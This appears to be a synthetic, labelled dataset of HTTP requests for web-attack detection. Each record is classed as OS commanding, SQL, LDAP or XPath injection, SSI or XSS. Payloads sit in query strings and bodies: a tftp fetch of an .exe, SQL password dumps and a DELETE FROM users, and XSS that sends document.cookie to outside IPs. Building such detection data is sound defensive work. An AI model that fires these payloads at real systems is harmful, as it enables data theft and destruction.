Host: 221.227.211.149
Connection: sNt9oa0
Accept: video/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=1
Client-ip: 52.176.42.105
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="889"
Date: Fri, 17 Jun 05 15:53:49 UTC
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: 100-continue
From: ilheiOI@yzloo.de
If-Modified-Since: Fri, 09 Jul 04 04:47:20 UTC
If-Unmodified-Since: Sun, 25 Sep 05 05:58:13 CET
If-Match: "wkIHvyXQR61ssp4j"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: Tue, 03 May 05 02:07:54 UTC
Max-Forwards: 017
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM dGVlbW9wNWVvd21temR0cmFOaG5lSVNUbGx0bU9tb2hlbA==
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://www.Rutesi.ch/Vuwefno.php4
TE: deflate,gzip
Trailer: From
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 1.5; IE-tu; rv:0.6.6) Gecko/37649072
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 6.3 www.engtnhd.jpeg
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49339
Start - Id: 43098
class: OsCommanding
GET /t8rbtt1oha/2vEOAXzGr/llca@ZO6dSxkVhXcLw6/62LwP/rfFyYqnW/1CUHyuKPsUirCE8/sNcSfI348NZSwp-Dv/tDGi.css?et5otauctltyh=77768280&anarRnxao=tftp+-c+++++get++139.238.73.217%3A%2Ficnatile%2Ficti.exe++%7C&ehia3ehefwslr=pPzft&yeaytotsel=89216401&nerreNblbqtr=6404921&n5e=%7CaaNnodeaiau58droptthmochaeipositionV&uvDMZNautoexeclcsock_stream=97&siec0trc=61zaui&moers1=D+++Elikeae+t&wairzmg=0895444873&nnsl=execohkp8jxgE&codo=482 HTTP/1.1
Host: www.cEep.uk
Connection: keep-alive
Accept: video/*;q=0.8, text/*;q=0.6, text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate;q=0.1, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: egd6s=6e editadminut~vbscriptSyadmin;3dcn0o8eNo9=xaxmlst;whereconnect.V=iKi;tdvsGqi=mPDJI4bhPB;7saew=tr\a4
Cookie2: $Version="127"
Date: Sun, 18 Jan 04 13:24:21 GMT
ETag: "7fMIFPet.bIBWEJyH"
If-Modified-Since: Tue, 03 Feb 04 16:41:24 GMT
If-Unmodified-Since: Tue, 20 Feb 07 16:38:22 CET
If-Match: "03M9dD5y5JmloZcTZw"
If-None-Match: *
If-Range: *
Max-Forwards: 274
MIME-Version: 1.3
Pragma: utogitrL=s
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /hlhieeiI.msf
TE: deflate
Trailer: If-Modified-Since
User-Agent: ieg6QN http://www.mrlrie.gov
UA-Disp: 418,932,32
UA-OS: Solaris
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: gzip
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Serial-Number: 306986025864028
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43098
Start - Id: 35406
class: SqlInjection
GET /X@/cugwPvjJ/eG50BINQHnosDhGTpLwH/o2nyDyF.9mjbLpv2_om/rhxUx4OUYrWWb/WrtEsga9edt/uR/ntwowab.js?a@b7GzGcvHI=6113107&GWetmp=t%3E6as9ioeoa&sqxwIW_tz=tXJFBp7jsF&tirar9=7769540&0lpBD27=PipcSt&t0TefnuUcee=%5Cjtsltwh%25ht&xtimtd=441724612&rmRUfuz=5172&uu2ns=sRDGD&er=iFid.rwYG&almtc6gfy9ts=%27union+select+PASSWORD+from+++DBA_PASSWORD%3B-- HTTP/1.1
Host: www.o4nt8.it
Connection: 2htw
Accept: video/mpeg;q=0.1, text/*, text/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: max-age=7792
Client-ip: 67.105.71.5
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="1"
Date: Tue, 30 Jun 09 11:40:24 CET
ETag: "w.bssa@znOLYSv9"
Expect: 100-continue
From: nceooR@ecnsnwaoq4.de
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: "ssNlss4K2-2ftHeQ7"
If-None-Match: *
If-Range: "He7_4Bhm_-USj@z@Fq3"
Max-Forwards: 7
MIME-Version: 4.3
Pragma: ilmaI='rnS'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM cndvc3RvZWJHZXNmZTU4cmJXaWRvYlNhaWFlMGdlZGk0UnVuNHA=
Range: -67
Referer: http://www.nShs.fr/Noeehss.jpg
TE: gzip
Trailer: Upgrade
User-Agent: reheBnui7y/2.2
UA-CPU: 68000
UA-Disp: 678,1314,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 1.0 www.lbur.html, e5soa2/7.9 www.fo4k2w.htm
Transfer-Encoding: sawwG; rPdgyO=te8eIg
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35406
Start - Id: 37861
class: LdapInjection
GET /ugoscogPra/isfdHqA/daYqJOk/AVlocationWUjRV/nQiV@3Rnu5YNbzVXxu1D/6NeertaRIsfPaco/ijb@rz6sKWB24e/hA2NolPrHNP13ge1/seimtshbyhtbiehDa/dawswthsi0lAire/oWN68c3nORDkpk/lUiC.asp?dta=ed6.W&hcspg=documenttdej1omuserina&sifEvunoeae7te=49655710&d9tL1ywohta=stnetohthg&meitWtSncatgE=%29+++%28%7C+++%28displayName%3Dhad*%29+%28name++++%3Dhad*+++%29%28++++mail%3Dhad*++++%29&ftmt=telrin5eau&le4Ratcrs=511&utsGsa6Obd=23326226&cewgni8t=64607481&dE=%5Chswn HTTP/1.1
Host: 105.194.50.241:509
Connection: hrhcDrs
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.8, identity;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.35.248.126
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="01"
Date: Fri, 26 Dec 08 09:34:51 GMT
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 13 Sep 09 06:17:52 UTC
If-Unmodified-Since: Sat, 27 Jun 09 07:00:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 118
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest username="otjbsa"
Authorization: NTLM ZXRldGViaWF4bW54ZUhMZWZodGFhdmlXZEliZXR1c3RlZUQ=
Range: 3-43,-454,28574-
Referer: http://isrigwla.com/ddroltap/OOmei/saesahdn/tutGo/ieln.php
TE: trailers,chunked;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: xis5gr (bROOzrMsC; 6JIkA6Sb3q; iF70si)
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: 6.8 www.wdcnen.css, HeHin/4.9 www.ons8hto.js:8, 4.0 193.216.63.243
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37861
Start - Id: 38007
class: LdapInjection
GET /zqrB/em1pTWer9Iilndsr/jI.jpeg?ymtpnTue7flunr=xt%29%28%26%28objectClass%3D+++1ueo*%29 HTTP/1.1
Host: www.wwmde.be:80
Connection: T9ns5
Accept: */*;q=0.9
Accept-Charset: shift_jis, x-mac-roman
Accept-Encoding: identity, deflate;q=0.1, identity;q=0.1, compress, gzip
Accept-Language: nubm-0Tst, o-dn, sgri-vlflTq;q=0.9
Cache-Control: no-transform
Client-ip: 41.179.118.200
Cookie: esheeezmo3=5;4SataT=oeh2raensikriolaai
Cookie2: $Version="949"
Date: Tue, 10 Nov 09 03:25:58 CET
ETag: "FpA_UeDHlRzDYzb"
Expect: 100-continue
From: Noqnil@peZa0.st
If-Modified-Since: Thu, 27 Aug 09 22:15:48 CET
If-Unmodified-Since: Fri, 15 Dec 06 09:38:44 UTC
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: "lBALiuBRewy@DTjjqF"
Max-Forwards: 2567
MIME-Version: 4.1
Pragma: dsier=iphxe
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Basic c2VkY0w6RWtvOW9GaQ==
Range: 17672-41
Referer: /nomlzl/ode1/gautph.bin
TE: trailers
Trailer: Connection
User-Agent: l6nBpohexd (njrR6gH1Io)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: deflate
Upgrade: jrr/4.9, egaar/4.0, 1Zoc/3.1, zjwo/5.8, 95o/6.0
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38007
Start - Id: 40398
class: SSI
POST /ox/ehtmdlNbn/aGi6T_tvD.CcKqq/zhnetrLeebbI/aXLYziz/-Umftp7h8bzT@O1usr6/2.RviyNS.exe? HTTP/1.1
Content-Length: 182
Content-Language: quKi,sJRleme,jsa1ix
Content-Encoding: deflate
Content-Location: /myhtid1/eijErno/nltxcg1/h9ra.msf
Content-MD5: NW9sYWNjaW1ldHR1ZUVwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Aug 07 23:00:39 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: 152.207.116.157
Connection: close
Accept: text/*, application/rtf;q=0.0
Accept-Charset: iso-10646-ucs-2, hz-gb-2312;q=0.1, windows-1253;q=0.9, us-ascii;q=0.5, x-mac-greek
Accept-Encoding: deflate;q=0.1, deflate, gzip, deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 114.160.166.134
Cookie: s9leNiph=ih:oA;es1=aletTrTaoa;moROobrnuhtir=9537
Cookie2: $Version="13"
Date: Sun, 27 Sep 09 16:09:49 UTC
ETag: "C1JZ8VSvPBBfnh32qEk"
Expect: 100-continue
From: tTQl@hy8nl.be
If-Modified-Since: Wed, 21 Jan 04 10:15:48 GMT
If-Match: *
If-None-Match: "5SdyTB56Xusv-C.fULwo"
Max-Forwards: 3450
Pragma: s8ltmlsa=ii
Authorization: axprti ghkn=ytqfaA
Referer: /bos34so7/2ttrhti.tar.gz
TE: trailers,trailers
User-Agent: ets9rQeaat
UA-CPU: Sparc
UA-Pixels: 5480x145
Transfer-Encoding: deflate
Upgrade: r0s/1.0, lq2/5.3, id5yom/8.4, lar/7.9
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 24.137.231.7

Innh5keer3yeo=o'&rqpHmhsFok=<!--    #include  virtual="d:\windows\autoexec.bat"     -->&eust5froiht=>ssstdI3fdaXMeIandod't&aleCeHarn=W8t&POCchild=2512683724

End - Id: 40398
Start - Id: 41373
class: SqlInjection
POST /cMSebw_2mTHWOkYsQk/9EkB/wEeebaehPyby/stnueGEfgoNn2et/eeimmhxE/rZuSDLxK/hD.RftlSDY.dll? HTTP/1.0
Content-Length: 233
Content-Language: tEr,moitil
Content-Encoding: identity
Content-Location: http://www.leareOdt.st/trplm/pnaia/orie/tct0t.zip
Content-MD5: SGE5cjEzcndlaGVzd2RzNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 19:04:10 GMT
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: 8.131.91.121
Connection: close
Accept: video/mpeg;q=0.6
Accept-Charset: iso-8859-1;q=0.2, cp-936;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: 3Ld-sT, groDk-2neskaRe, Xtlsa7t-qhe;q=0.2, tnxtuhn-egegttn;q=0.9, EeoYe-d
Cache-Control: aicceubi='TTthlh'
Client-ip: 56.233.228.196
Cookie: d0varF6SFBDH='uw~ eo4u\tmadcm\i;eseoa=dKYcjSUK
Cookie2: $Version="6"
Date: Fri, 30 Sep 05 24:13:53 CET
ETag: "1szJG5Qqdon.9toUC3"
Expect: Nerh01=hehmt9
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Mon, 07 Dec 09 06:06:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2254
MIME-Version: 2.2
Pragma: rese='cOsc'
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: 32232-38984,57-
Referer: http://www.i7mnpea.cz/di4tgge.avi
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: oobeeS5q7sis
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: HTTP/3.2 32.51.231.160:5, 3.6 29.37.162.151, HTTP/5.8 238.249.74.66
Transfer-Encoding: gzip
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oemc8A=a4niip&hrm=0mLones'   ); DEL/**/ETE    FROM   users WHERE    upper(username)  =    upper(  'admin&Ts7eo3o7rmtn8=31876665&--rand=znOas>bt&3ffm=718&l3jToep=nhEd&3gteiV=497&mxqDlJ=o&ialt=3358383&etsH=5021985

End - Id: 41373
Start - Id: 49752
class: XPathInjection
GET /au.php?jxtmAXDGprocessing-instructionO=orrqivHcVy&sasmiIntlb=d%40&kEeet2uwDrst=1sdivoi&eadvmirntj=3068&etanzne=124++or+++++1%3C++++To%2FrtoGy%2Figudu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D50%5D+++++or++++9%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 57.82.47.118
Connection: nglit7
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: whap-spewkiT;q=0.7, idAn-wehreO;q=0.5, z-hnsale, ymbw2sia-tepuhe;q=0.3, ednaael-rlz;q=0.0
Cache-Control: 9r8='nthie'
Client-ip: 174.223.163.133
Cookie: bZi79qpBS=  rS2;S6ic=dS4i;sjutdwtnn8Eu= n;da=43574573;sev8lls=76
Cookie2: $Version="0"
Date: Sun, 10 Jan 10 22:08:56 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: 100-continue
From: tyese@ksT0ri.gov
If-Modified-Since: Wed, 09 Aug 06 21:32:23 GMT
If-Unmodified-Since: Tue, 06 Jul 04 08:55:47 CET
If-Match: *
If-None-Match: "yRTqUh.zN_gEXj28llO5"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 7
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: aaoe afoasci=wwir
Authorization: tyoeey anees=satta
Range: -1702
Referer: /aIdjwqh/arqrhue0/lej7.bin
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: a7heskols (wazbIw; 9qt7NAD; zp3j8H8H5)
UA-CPU: x86
UA-Disp: 317,738,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 4.0 www.ooleolsE.jpg, 3.5 186.12.230.187:812
Transfer-Encoding: deflate
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 781 www.hoetei.html "9scprerIsitC95r" "Thu, 17 Feb 05 10:38:24 GMT"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49752
Start - Id: 49344
class: XPathInjection
GET /uonnoodecw/7NjesfhaSqshu5dkE/t5nreplaceI@jwQQ/hhi.php?onuinurb=a8ou&dwzsn=mete%7Ceehhtvbscriptat&aanstbntaeisiW=aihwts%27%5D+++%7C+++P+++%7C+%2F%2Fuser%5B+name%2Ftext%28++%29++++%3D+++%27e6u&ohto=henedox%7Esystemtxba4+Mt HTTP/1.0
Host: 142.109.210.245
Connection: cteAs
Accept: text/*, application/*
Accept-Charset: iso-8859-9, euc-jp
Accept-Encoding: compress;q=0.5, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-age=008
Client-ip: 179.131.115.59
Cookie: aRoahifymyIBer=642922667
Cookie2: $Version="415"
Date: Fri, 21 Oct 05 06:20:12 CET
ETag: W/"5SJ1rsuHDeMmiBuju"
Expect: oitbte
From: ilheiOI@yzloo.de
If-Modified-Since: Mon, 27 Mar 06 23:30:31 GMT
If-Unmodified-Since: Tue, 10 Feb 04 22:25:29 GMT
If-Match: "2xv2HFgdRTZ32-tJhn"
If-None-Match: *
If-Range: Fri, 08 Jul 05 04:15:41 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: nedhe='ie'
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic MmkxM0M6MXJiZQ==
Range: 39-,253249-,539-99
Referer: http://www.setIn.org/onczim/toiyse/2ueohao.zip
TE: deflate,gzip
Trailer: Upgrade
User-Agent: occHwnetfd
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 5.3 19.231.4.126, 3.3 www.i7nT.gif, FTP/7.5 78.28.53.167
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49344
Start - Id: 47751
class: XSS
GET /r-MhY-wRjS5aRjTm@lR4/ohnNlgstacdo/0ebhb6esir3resottc/eZW.NLkZSF-29/fdoEeeTnehoda/nb3HoNHZvKK/dOannien/R2nmi/uo/rB9hCqN/e4ozthX4R.jpeg?A83cit1bsewsens=male&adast8tEoga=%5BO%5C%24tu8+oeRa0&jti60nrTirsusrg=k0EB&n5eiehe0Miuc=utdInecxeleaie&4csgnoelgids=wservices&oso7fdqbit6c=zETwp-o&5km3ohtd=%3Clink+rel+%3D+++%22stylesheet+++++++%22++++href++%3D+%22+++++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F155.208.86.80%2Fse.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&vtcwvece0i=6022964&oee5lent=cuarite HTTP/1.1
Host: 234.147.29.21
Connection: EmlutBni
Accept: */*;q=0.1
Accept-Charset: windows-1254, iso-8859-2, iso-8859-4, x-mac-korean;q=0.6, iso-8859-8
Accept-Encoding: *
Accept-Language: ttis-3s0a7b, t-crics, 9c0-1yee1;q=0.8, qhoo60h4-a;q=0.5, id7-qigmq;q=0.4
Cache-Control: no-transform
Client-ip: 72.188.119.217
Cookie: eerbneUse=)asse7union2m
Cookie2: $Version="00"
Date: Wed, 07 Jan 04 11:16:03 GMT
ETag: W/"sPg8XQuBd1fbCE95qfIX"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Tue, 29 Jun 04 16:36:17 UTC
If-Unmodified-Since: Sun, 02 Jul 06 16:53:25 GMT
If-Match: *
If-None-Match: "Q5rXo6GZfPhYCz9js"
If-Range: Mon, 29 Jun 09 04:58:41 CET
Max-Forwards: 4
MIME-Version: 7.7
Pragma: stt6=4aNi
Proxy-Authorization: Basic b3Q3YXlzZm06ZHZjaG5m
Authorization: Digest nonce
Range: -887125,6715-3229
Referer: http://camlpyh.be/Larlnmoa/7slm3a/0iTN/geroTe.wmn
TE: gzip
Trailer: Date
User-Agent: Mozilla/7.3 (Windows; U; WinNT 3.7; yr-iD; rv:0.1.0) Gecko/06438075
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: 9.3 www.Emda.js
Transfer-Encoding: deflate
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 007 99.146.164.232:6 "uilesuwut6rpu" "Thu, 10 Feb 05 15:43:00 CET"
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47751
Start - Id: 41504
class: SqlInjection
PUT /8UEsIWeo7ktoleezd4O/68N7kfdTvbscript/3V9z31yWoW8V3MQIs7t/hT0wmWlwBMpTlb1w/hWWincludeV4UWqaGmtrX/K-bodyQC7MaiFS/ioyes0su1Gzoitcnm/tvxUt64D/servicesncafrom1KWXMd/2ppfqbT/95ZFsRd1LPPHOh/rmli6.tiff? HTTP/1.0
Content-Length: 91
Content-Language: 1tm,xe
Content-Encoding: gzip
Content-Location: /iBhAaarm/oqlA.wmn
Content-MD5: dXQ4aWNUS0RpckhaYXIyNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Apr 06 23:03:27 GMT
Last-Modified: Thu, 09 Jul 09 05:52:17 GMT
Host: www.iAtxstw.net
Connection: keep-alive
Accept: application/*, image/*;q=0.6, audio/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.5, gzip
Accept-Language: t-rp
Cache-Control: laosssCt=nWn
Client-ip: 3.29.1.103
Cookie: vnediOeAtocwwes=860649;ccinsertz1B9bodyxSx=)2w 7ieNb ~
Cookie2: $Version="13"
Date: Mon, 13 Nov 06 15:41:45 CET
ETag: W/"6wYRe7NHXfdKLFK"
Expect: maEbbf
From: dsdnen0@rs1ryqaaes.uk
If-Modified-Since: Wed, 28 Nov 07 14:09:53 CET
If-Unmodified-Since: Sun, 07 Mar 04 04:55:01 UTC
If-Match: "jS_@PhBQ.eTxcRurXC"
If-None-Match: "zBaWVeRsJOGOdfic3"
If-Range: *
Max-Forwards: 8
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 229-94,-0,-455
Referer: http://www.t297.uk/at6efs/gHime/ddaPx/pitPathl.jsp
TE: deflate;q=0.9,trailers,gzip
Trailer: TE
User-Agent: oR64Eythie (3iigybKVM; emGlYczYP; aCMYkz)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: deflate
Upgrade: qesoym/6.9, itea/7.1, ren/6.1, Ewserd/7.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tGsto=' /**/ OR   /**/  'ovttl'   >    'S&Havbscriptw=nunion&Avx=irqi2zno

End - Id: 41504
Start - Id: 49841
class: XPathInjection
GET /amdR@EA87Cwft-/tlmC8J.E/clb6liyTnytAs/s44jHC/wdocteeul/HSVAc07/aUumlo/vce1loaFrc3.nsf?iMrpunot1ntg=yeNn&Teene8yhe3aeidt=snp&sesx7e8ltueRgK=rykTcla0itJ&wdeldaudt2rwT=je7tycb&sIosclb=7bscD%27++++or++++1%3C+ttnHms%2Fehev%2Fa07%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+or++%27g8i6lei0%27+%3D+++%27&NIniensmet=70 HTTP/1.0
Host: 32.58.207.15
Connection: dzs1i
Accept: */*
Accept-Charset: iso-2022-jp, koi8-r;q=0.6
Accept-Encoding: 
Accept-Language: ozNqnscy-J, nDcrds-s;q=0.3
Cache-Control: min-fresh=3
Client-ip: 146.101.131.153
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Sat, 11 Dec 04 22:06:09 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: ackeIlr=n1aE
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Fri, 21 Apr 06 14:56:57 UTC
If-Unmodified-Since: Sat, 02 Dec 06 21:21:14 CET
If-Match: *
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 70
MIME-Version: 4.3
Pragma: wxf=am
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest cnonce="cmnoh"
Range: 376648-,445-
Referer: http://www.tolihob0.org/iar4Owrm/asweCdn/benEu/iodoino8/zfnnle.swf
TE: trailers,deflate;q=0.4
Trailer: Accept
User-Agent: Mozilla/1.8 (compatible; MSIE 0.8; Solaris; trofr; hhE7Re; rNHespz1)
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: qtplca/7.0 www.he6tWdg5.gif
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 6075380404911977
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49841
Start - Id: 47975
class: XSS
GET /ZG4/oeLgZUQ2lj/0tteetsbnhathedtn/aaexr1eq/eYp0_L21HQkWhF/sRmtCyA-MjmcK.aspx?ql5hmvnxnoeu0e=iyh&yeindbce=%3Cstyle++type%3D+++%22+++text%2Fjavascript+++%22%3E%5Bwindow.open%28%27http%3A%2F%2F178.17.65.101%2Fsiroro.mdb%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E&.AdScgnph-=rb8-y20xS HTTP/1.1
Host: 59.121.123.132
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: ypR-nBin89
Cache-Control: min-fresh=55126
Client-ip: 233.73.193.14
Cookie: fS=lm4aivuooDlery;execO-0d8swherewV=004;iettr=4806007;abp2aesheo=aIo;7Sq07ot=04Zs@0
Cookie2: $Version="0"
Date: Fri, 31 Aug 07 18:06:30 UTC
ETag: "kFEKDuKQ32KeyH6uwq"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Wed, 28 Nov 07 17:26:09 CET
If-Unmodified-Since: Wed, 13 Oct 04 15:45:00 CET
If-Match: *
If-None-Match: *
If-Range: "KS@_rDCk9NsUb.kxDdDr"
Max-Forwards: 986
MIME-Version: 0.3
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: saeMvi u5li=itna
Range: 3229-,-51,25363-27158
Referer: /d4li/TyomCe/hes1u5/aeteys.dll
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: ruahoitc/6.0
UA-CPU: MIPS
UA-Disp: 305,820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/9.1 www.v2fhrel2.jpg, FTP/9.4 www.etojy.js
Transfer-Encoding: compress
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47975
Start - Id: 41831
class: SqlInjection
